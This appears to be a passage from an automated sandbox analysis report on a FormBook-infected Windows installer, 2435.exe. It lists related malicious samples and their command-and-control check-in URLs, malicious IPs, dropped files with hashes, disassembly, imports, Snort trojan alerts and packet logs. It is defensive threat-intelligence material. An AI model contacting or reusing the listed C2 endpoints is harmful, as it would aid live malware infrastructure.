	#U20ac9,770 pdf.exe	Get hash	malicious	Browse	www.jobswithsecurityclearance.com/pux4/?Lv0h=3mylV7pVONTMNM6aC/niqCihOZ2+qzoqaVpusSVEetlxoEhqYhjCa0mWM/mNyWLbLdeFpUieiA==&VlKt=wBNl4pd0L
	Pdf Scen Invoice 17INV06003.exe	Get hash	malicious	Browse	www.friendsed.com/s5cm/?O2=aT8vL+GQ5CKbWMYK7VfKTGSzb4SrkpvWRcVzxRDty813pzzqsjZ5NUDQNQmBAQnsw0DU&2d=YX9ti2PX
	ORDER LIST.pdf.exe	Get hash	malicious	Browse	www.chrispricellc.com/owws/?t8l=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whQbeNAVt45EvY6Zw==&YBZL=lxldV
	quote.pdf.exe	Get hash	malicious	Browse	www.chrispricellc.com/owws/?rVEx8D=S0GhCH&RR=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whpEvtDb7k+EvY9KA==
	hrUbr1mLqzggh0H.exe	Get hash	malicious	Browse	www.poltgroup.com/onqm/?6l=doD+GTTuj0wR7cILLxImcVYaTf1RJOz68mAknHdMm+lQBhaMdEcvcwimwgDNMMFRe7JRpz2F8Q==&2dm=3fklvpq0OPLdJVy
	packa.....(1).exe	Get hash	malicious	Browse	www.educationstarcorp.com/wdva/?kfD4qZ=xabDW6gRomVRJCfQhE+1Y8vLHDgRz3GtPRqb2ZQ8ev+ZOg56Covo/3nqdMEaAH6lCy+g&kr0=dbF0vFoPNvL
	Pdf MT103 - Remittance.pdf.exe	Get hash	malicious	Browse	www.ultimateplumpudding.co.uk/s5cm/?kR-4q=E2OK2mHSQGkTABA7rh5rFu9YJ97LBg918ZBY5I6VyKJbM1VF4fyc5eTvcYaTxAWeq+U4CfyJeQ==&P0D=Atxturd
	henry.exe	Get hash	malicious	Browse	www.booster.guru/aipc/?MZg=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&zTxX=ApdHHR
	Ohki Blower Skid Base Enquiry 052521.exe	Get hash	malicious	Browse	www.greenshirecommons.com/un8c/?vR=Ltxx&5j9=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwtQB3QA9Z6BY
	porosi e re Fature Proforma.exe	Get hash	malicious	Browse	www.fux.xyz/nt8e/?v2Mp4=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&jJBP5D=-ZpPy
	CamScanner 24.05.2021 10.01.exe	Get hash	malicious	Browse	www.pacificsoucre.com/ainq/?Nji0Xf=8p7tvpAP&mlvx=pIngp1ZjDfSyLzoneSC3xwzm0h2uYzOW09iGJacWdr+L3f1uJRS1s7wexdcfTOtLplEo
170.39.76.111	Proof of Payment.bat.exe	Get hash	malicious	Browse	www.houseofsisson.com/dxe/?9rTd=b89ptlBx&F48lVPl=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH0luWFwfr74U

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.northsytyle.com	CONTAINER DEPOSIT.exe	Get hash	malicious	Browse	199.59.242.153
www.northsytyle.com	03003 NAVEENA.exe	Get hash	malicious	Browse	199.59.242.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
BODIS-NJUS	] New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	199.59.242.153
	fD56g4DRzG.exe	Get hash	malicious	Browse	199.59.242.153
	malware300.docm	Get hash	malicious	Browse	199.59.242.153
	Payment.exe	Get hash	malicious	Browse	199.59.242.153
	PROFORMA INVOICE PDF.exe	Get hash	malicious	Browse	199.59.242.153
	Order.exe	Get hash	malicious	Browse	199.59.242.153
	INQ-741-020621-PDF.exe	Get hash	malicious	Browse	199.59.242.153
	CONTAINER DEPOSIT.exe	Get hash	malicious	Browse	199.59.242.153
	Swift copy_9808.exe	Get hash	malicious	Browse	199.59.242.153
	S5.exe	Get hash	malicious	Browse	199.59.242.153
	#U20ac9,770 pdf.exe	Get hash	malicious	Browse	199.59.242.153
	Pdf Scen Invoice 17INV06003.exe	Get hash	malicious	Browse	199.59.242.153
	ORDER LIST.pdf.exe	Get hash	malicious	Browse	199.59.242.153
	quote.pdf.exe	Get hash	malicious	Browse	199.59.242.153
	hrUbr1mLqzggh0H.exe	Get hash	malicious	Browse	199.59.242.153
	packa.....(1).exe	Get hash	malicious	Browse	199.59.242.153
	Pdf MT103 - Remittance.pdf.exe	Get hash	malicious	Browse	199.59.242.153
	henry.exe	Get hash	malicious	Browse	199.59.242.153
	Ohki Blower Skid Base Enquiry 052521.exe	Get hash	malicious	Browse	199.59.242.153
	porosi e re Fature Proforma.exe	Get hash	malicious	Browse	199.59.242.153
PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY	Proof of Payment.bat.exe	Get hash	malicious	Browse	170.39.76.111
PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY	networkservice	Get hash	malicious	Browse	170.38.30.47

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll	INVOICE.exe	Get hash	malicious	Browse
	Shipment Invoice & Consignment Notification.exe	Get hash	malicious	Browse
	KY4cmAI0jU.exe	Get hash	malicious	Browse
	5t2CmTUhKc.exe	Get hash	malicious	Browse
	8qdfmqz1PN.exe	Get hash	malicious	Browse
	New Order PO2193570O1.doc	Get hash	malicious	Browse
	L2.xlsx	Get hash	malicious	Browse
	Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx	Get hash	malicious	Browse
	New Order PO2193570O1.pdf.exe	Get hash	malicious	Browse
	2320900000000.exe	Get hash	malicious	Browse
	CshpH9OSkc.exe	Get hash	malicious	Browse
	5SXTKXCnqS.exe	Get hash	malicious	Browse
	i6xFULh8J5.exe	Get hash	malicious	Browse
	AWB00028487364 -000487449287.doc	Get hash	malicious	Browse
	090049000009000.exe	Get hash	malicious	Browse
	dYy3yfSkwY.exe	Get hash	malicious	Browse
	PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx	Get hash	malicious	Browse
	Purchase Order Price List 061021.xlsx	Get hash	malicious	Browse
	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Get hash	malicious	Browse
	UGGJ4NnzFz.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7us089c3e295ppclg6d9 Download File
Process:	C:\Users\user\Desktop\2435.exe
File Type:	data
Category:	dropped
Size (bytes):	185856
Entropy (8bit):	7.99888602903792
Encrypted:	true
SSDEEP:	3072:65VNf/TDZwRRAkO7E7kbp7Vl9t2LhmgKWRqzMZa13EF9vEA5zTreL2aO+O+Ln5kB:4VNf/TDZwRWemHih7dR+h13Ev8AJTreq
MD5:	1627D711EE3FADA81CB858B5682C85D2
SHA1:	EFB13FDD0B52CF4E38DB413F55E32499CCEA29C7
SHA-256:	3022E519B47BD426CB96248689E855D363BA2F4EBB55F77CF5507AB2E6738EB8
SHA-512:	81D0E226A8BD6F51248B4A9E8B955B03DA877637DBBA101BE4B374F0C80EBFE226AF3D3D1F5D18E8A6429F54B9634363E4A8BF2B8D56CAA549DCC14F54AA1AC5
Malicious:	false
Reputation:	low
Preview:	....X%....}.C_Z.8.......X...+.&...\|e..,..A1a..j........h.........."..=P5....p.....O...0+H1..E?.N....w..VM...j.Z.ss..i..m.~....../...d_.B,...v{..(b..5w.>..'.1d.D.gd...6....U.7....3Y....d...{c8.6.;......?....F....n..6.x.[.N.B........X.H..f._.;LL....sX........R..D..w...?....oA#SWO.N.s"....b 0I.H..od..:...v.$...=.<mc...8.2SX\...]F.2.....>a...%..L..\....}....[ek.+...=l\S.H...........k.h......3........TK...0"Y.'..x`.j.6.{.lj..1Ve/.V....7{.......GL..8..D..OZ..%....Q.......uY...{..H.O.Z0&..1@G.{k+baxKr...3....>.)....IB.....1.w..1.pm.........\. ..q....FuXK..X5.fJ.o.9B...O....E.nz.]..i.......X[k.lY.(&...m.D..9TQm$...L7..;rF$...>q........P.....0W..L.....4.G.2..E.R./#..A....6.d......yk.Ns.]p..5...qnK.H.*...1H......l..........<}&.r..5..%....n..O..:.T}..q.i....;7...<....x..Z....P.L..u&.r.o..m..s.....q6..g.G...KX9....w-.L#[.D\...O..[....V...@.1...{...LDV<W.wG.Y...^.=.(..7.W..V.<...'hh..k.t....../....MU....R......G...../..P5.rSM 0T.

C:\Users\user\AppData\Local\Temp\nsq165.tmp Download File
Process:	C:\Users\user\Desktop\2435.exe
File Type:	data
Category:	dropped
Size (bytes):	282767
Entropy (8bit):	7.422689004181164
Encrypted:	false
SSDEEP:	6144:ydiVNf/TDZwRWemHih7dR+h13Ev8AJTreji+iLBB02OVaDut:1xFwE/mZRKEv8AVejqLBBFOVAm
MD5:	2213022F76B392D6513DB66830C31224
SHA1:	F6E1A73360DE6224A5ADB6A72486DACD7D8680C1
SHA-256:	F47B6AB6DFAC7A60DEEC2078801BFF19C808BB3485E6A56A9214FE81F979A1A7
SHA-512:	D1E4C16D19F210FB0E2F93BB652BA8D9F0F05985BECE148BF075A233A394B20B8FA303CDEE1CFC5B80E3A3B628F65A1B6ABF1C5B0C31525A969F04DFD6757499
Malicious:	false
Reputation:	low
Preview:	.m......,.......................LP......8l.......m..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll Download File
Process:	C:\Users\user\Desktop\2435.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: INVOICE.exe, Detection: malicious, Browse Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse Filename: KY4cmAI0jU.exe, Detection: malicious, Browse Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse Filename: New Order PO2193570O1.doc, Detection: malicious, Browse Filename: L2.xlsx, Detection: malicious, Browse Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse Filename: 2320900000000.exe, Detection: malicious, Browse Filename: CshpH9OSkc.exe, Detection: malicious, Browse Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse Filename: i6xFULh8J5.exe, Detection: malicious, Browse Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse Filename: 090049000009000.exe, Detection: malicious, Browse Filename: dYy3yfSkwY.exe, Detection: malicious, Browse Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sbmborptcxfjep Download File
Process:	C:\Users\user\Desktop\2435.exe
File Type:	data
Category:	dropped
Size (bytes):	57185
Entropy (8bit):	4.984632645340986
Encrypted:	false
SSDEEP:	768:/7VNqmd/WNWRdN9UKYDnr3ArvJcXBFRW45fZ2SjL0djJsa7FqkcKHqTW4ipLc4+C:Hb/W4dNmr34vSXR5h2O0Dsa7k8p+UQS
MD5:	D3A1658292AB20E82B114799AE33644E
SHA1:	71FFB4BCD29917B2E177AFA1D5B9B30056DA6FA6
SHA-256:	AD00C8FCF5DCE9F7CDA163E7746E1070BDC50F0791664731F8F9AA226741E57E
SHA-512:	DB81E4EAC967E36DF3115A51F628492D8EC369D34202ECA31BCE6A8C0974B585F7866EBE7668AC9C5309EC3CAACEEB57023C1C3C1F72F13DA0DB7D9F1EC045F8
Malicious:	false
Reputation:	low
Preview:	U... ...#........>...........u.....e.....e.................9...........'.....a.....e.................9...........9...........\.....e.....e.......................e.......................u.....e.....e.....e...........................................................e...........s. .....!.....".....#...#.$...e.%...e.&.....'.....(.....).....*.....+.....,.....-.........../.....0.....1.....2.....3.....4...8.5...A.6.....7.....8...%.9.....:...e.;...e.<...e.=.....>.....?.....@...d.A...d.B...d.C.....D.....E...!.F.....G.....H...%.I...e.J.....K...s.L.....M.....N...!.O...#.P...e.Q...e.R.....S.....T...!.U.....V.....W.....X...!.Y.....Z.....[...%.\.....].....^....._...%.`...8.a...A.b.....c.....d.....e...].f...e.g...e.h...e.i.....j.....k.....l...d.m...d.n...d.o.....p.....q.....r.....s.....t.....u...e.v.....w...s.x.....y.....z.....{...#.\|...e.}...e.~................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.92290852118761
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2435.exe
File size:	241748
MD5:	862b4c2abad2c07ac13d5e051c18ab86
SHA1:	c78f0a59312c7902e445c5a31d4896907e96475c
SHA256:	c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
SHA512:	a4972c953b97e257c9c86528aa948b38dd4bcdef0cb2e1c5a661be864ce9d305efc499f40c8e2e9187541200df5b81c5e1c364a6a5169003357ae912596425f9
SSDEEP:	6144:Ds9e9CRE9m5SmMZ0AQV3Xtx4abWIj9Jtbs:yemUlmMKAQp9tpjPtbs
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x40323c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007FEC80AE5A6Eh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007FEC80AE5721h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007FEC80AE570Fh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007FEC80AE2E6Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FEC80AE5202h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FEC80AE2EC5h
cmp cl, 00000020h
jne 00007FEC80AE2E68h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FEC80AE2E5Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5a5a	0x5c00	False	0.660453464674	data	6.41769823686	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.4453125	data	5.18162709925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55859375	data	4.70902740305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x9e0	0xa00	False	0.45625	data	4.51012867721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c190	0x2e8	data	English	United States
RT_DIALOG	0x2c478	0x100	data	English	United States
RT_DIALOG	0x2c578	0x11c	data	English	United States
RT_DIALOG	0x2c698	0x60	data	English	United States
RT_GROUP_ICON	0x2c6f8	0x14	data	English	United States
RT_MANIFEST	0x2c710	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/11/21-12:13:57.288476	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.5	199.59.242.153
06/11/21-12:13:57.288476	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.5	199.59.242.153
06/11/21-12:13:57.288476	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.5	199.59.242.153
06/11/21-12:14:18.417415	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.5	34.102.136.180
06/11/21-12:14:18.417415	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.5	34.102.136.180
06/11/21-12:14:18.417415	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.5	34.102.136.180
06/11/21-12:14:18.562024	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49720	34.102.136.180	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 12:13:57.109199047 CEST	49719	80	192.168.2.5	199.59.242.153
Jun 11, 2021 12:13:57.261039019 CEST	80	49719	199.59.242.153	192.168.2.5
Jun 11, 2021 12:13:57.261240005 CEST	49719	80	192.168.2.5	199.59.242.153
Jun 11, 2021 12:13:57.288475990 CEST	49719	80	192.168.2.5	199.59.242.153
Jun 11, 2021 12:13:57.415497065 CEST	80	49719	199.59.242.153	192.168.2.5
Jun 11, 2021 12:13:57.415965080 CEST	80	49719	199.59.242.153	192.168.2.5
Jun 11, 2021 12:13:57.415990114 CEST	80	49719	199.59.242.153	192.168.2.5
Jun 11, 2021 12:13:57.416002035 CEST	80	49719	199.59.242.153	192.168.2.5
Jun 11, 2021 12:13:57.416013002 CEST	80	49719	199.59.242.153	192.168.2.5
Jun 11, 2021 12:13:57.416026115 CEST	80	49719	199.59.242.153	192.168.2.5
Jun 11, 2021 12:13:57.416174889 CEST	49719	80	192.168.2.5	199.59.242.153
Jun 11, 2021 12:13:58.092125893 CEST	49719	80	192.168.2.5	199.59.242.153
Jun 11, 2021 12:14:18.374717951 CEST	49720	80	192.168.2.5	34.102.136.180
Jun 11, 2021 12:14:18.417139053 CEST	80	49720	34.102.136.180	192.168.2.5
Jun 11, 2021 12:14:18.417279959 CEST	49720	80	192.168.2.5	34.102.136.180
Jun 11, 2021 12:14:18.417414904 CEST	49720	80	192.168.2.5	34.102.136.180
Jun 11, 2021 12:14:18.459662914 CEST	80	49720	34.102.136.180	192.168.2.5
Jun 11, 2021 12:14:18.562024117 CEST	80	49720	34.102.136.180	192.168.2.5
Jun 11, 2021 12:14:18.562061071 CEST	80	49720	34.102.136.180	192.168.2.5
Jun 11, 2021 12:14:18.562263966 CEST	49720	80	192.168.2.5	34.102.136.180
Jun 11, 2021 12:14:18.562402010 CEST	49720	80	192.168.2.5	34.102.136.180
Jun 11, 2021 12:14:18.604703903 CEST	80	49720	34.102.136.180	192.168.2.5
Jun 11, 2021 12:14:38.937189102 CEST	49722	80	192.168.2.5	170.39.76.111
Jun 11, 2021 12:14:39.094544888 CEST	80	49722	170.39.76.111	192.168.2.5
Jun 11, 2021 12:14:39.094655991 CEST	49722	80	192.168.2.5	170.39.76.111
Jun 11, 2021 12:14:39.094999075 CEST	49722	80	192.168.2.5	170.39.76.111
Jun 11, 2021 12:14:39.253957033 CEST	80	49722	170.39.76.111	192.168.2.5
Jun 11, 2021 12:14:39.417160988 CEST	80	49722	170.39.76.111	192.168.2.5
Jun 11, 2021 12:14:39.417213917 CEST	80	49722	170.39.76.111	192.168.2.5
Jun 11, 2021 12:14:39.417313099 CEST	49722	80	192.168.2.5	170.39.76.111
Jun 11, 2021 12:14:39.417368889 CEST	49722	80	192.168.2.5	170.39.76.111
Jun 11, 2021 12:14:39.574393034 CEST	80	49722	170.39.76.111	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 12:12:37.014842987 CEST	54302	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:37.018404007 CEST	53784	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:37.074642897 CEST	65307	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:37.078557014 CEST	53	53784	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:37.089776039 CEST	53	54302	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:37.126888037 CEST	53	65307	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:37.202214956 CEST	64344	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:37.252634048 CEST	53	64344	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:39.975965023 CEST	62060	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:40.038592100 CEST	53	62060	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:43.154540062 CEST	61805	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:43.208348989 CEST	53	61805	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:44.512192965 CEST	54795	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:44.562550068 CEST	53	54795	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:45.898520947 CEST	49557	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:45.948964119 CEST	53	49557	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:47.976841927 CEST	61733	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:48.029856920 CEST	53	61733	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:49.435123920 CEST	65447	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:49.485213041 CEST	53	65447	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:50.274744034 CEST	52441	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:50.325207949 CEST	53	52441	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:51.934648991 CEST	62176	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:51.984662056 CEST	53	62176	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:52.814543009 CEST	59596	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:52.864653111 CEST	53	59596	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:54.049725056 CEST	65296	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:54.101264000 CEST	53	65296	8.8.8.8	192.168.2.5
Jun 11, 2021 12:12:55.797203064 CEST	63183	53	192.168.2.5	8.8.8.8
Jun 11, 2021 12:12:55.850246906 CEST	53	63183	8.8.8.8	192.168.2.5
